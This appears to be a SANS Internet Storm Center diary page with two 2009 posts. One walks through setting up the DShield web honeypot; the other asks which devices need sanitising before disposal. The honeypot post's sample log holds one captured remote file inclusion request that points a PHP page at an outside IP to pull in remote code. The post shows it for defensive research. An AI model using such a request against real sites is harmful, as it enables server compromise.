Threat Level: green Handler on Duty: Manuel Pelaez

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Webhoneypot fun

Published: 2009-03-26
Last Updated: 2009-03-27 06:42:17 UTC
by Mark Hofman (Version: 1)
1 comment(s)

37 days ago the DShield webhoneypot project released the first Alpha of the code.  I hadn't really had much time to play with it yet, but one of our readers had a challenge with his submissions, so I figured I'd better get my hands dirty.   Another reason is that there does seem to be a lot of malicious web traffic around at the moment and I wanted to grab some of it. 

So here is a quick run down of my webhoneypot experience.  

Firstly I logged into DShield and under "My Information"  I entered the Honeypot URL and ticked the "Honeypot is Active" button.

Next to grab the code.  The code is hosted on Google and can be obtained here    The site has install information and several releases are available, the raw code, a debian package and a Mac OS X package.   Looking at the install instructions I decided to go with the debian package.   (Now before you chuckle it was because I only had about 15 minutes or so to get it done and like many time poor people I like shortcuts.  It was not because the install instructions are not good.  In fact quite the opposite.)

So I built a new Debian 5 VM on a virtualbox which was straight forward.  I only installed a very minimal system with Apache, and PHP5  About 10 minutes gone.  

After grabbing the deb file I installed it using the "Installation with a Debian Package" instructions,  which took about 3 seconds or so.   It asks you what port number you would like to use, sets up the relevant start jobs etc.  In short it does pretty much everything for you.  Once you have completed this step you have a honeypot running on the machine and all you need to do is change the /opt/webhoneypot/etc/config.local file and enter your DShield userid (which will be your email address) and password in the file (the userid=yourdshieldemailaddress  and password=thepasswordfortheuserid   do not use " )  

The final step after this is was to open a browser and go to the web page.  When you hit the page you will get a message along the lines of "Check logfile for hashpassword".   This basically verifies that you have successfully connected to DShield.  You replace the password=thepasswordfortheuserid  line   with the hashpassword=738abc..... parameter from the log file and you are good to go. 

Revisit the web page with, for example, a robots.txt request and you will get a response.  When you look in the log file /opt/webhoneypot/logs/honey.... file  you will see an entry along the lines of  timestamp  IP-Address Delivered Template 123 .  If you see that, the log line was delivered (123 is just an example you will see different numbers).

Log into  DShield again and under the "My Weblogs" tag you should see your test log entries.  For example: 

Time

URL

Source

Target

11:11:33

GET /robots.txt HTTP/1.1

192.168.22.10

202.999.999.24

11:14:29

GET /robots.txt HTTP/1.1

192.168.22.10

202.999.999.24

11:12:36

GET /i.php?page=http://204.2.183.2/babycaleb/picture.htm? HTTP/1.1

192.168.22.10

202.999.999.24

Total time taken, twenty minutes.  Ten minutes to install an OS onto the VM and five minutes or so because I borked my VM's network connection.  A final five minutes to install and configure the Honeypot.  

The guys on the team have done a great job.  If you have a spare IP this is a great way to contribute.  Give it a go. 

Mark H - Shearwater 

For those of you that are students and think Honeypots might be something you are interested in, then check out the Honeynet Project Google Summer of Code page http://www.honeynet.org/gsoc .  

1 comment(s)

Sanitising media

Published: 2009-03-26
Last Updated: 2009-03-26 21:05:07 UTC
by Mark Hofman (Version: 1)
0 comment(s)

Pat asked an interesting question.  He, like many of us, has the requirement to make sure that information doesn't accidentally leave the organisation on equipment that is being disposed off.  

To stop this many of us will have procedures to sanitise or destroy media, but what exactly are you targeting?   Hard disks, CD, DVDs, USB/Flash Drives are all the obvious ones.  Blackberries, Iphones or MP3 players are less obvious devices. However what else should you cleanse or even destroy?

Here are some things that I thought off that could be included: 

  • Hard disks from Printers
  • Printer drums
  • Cameras
  • Digital photo Frames

Let me know what other devices you sanitise before leaving the organisation. 

Mark H 

0 comment(s)
Diary Archives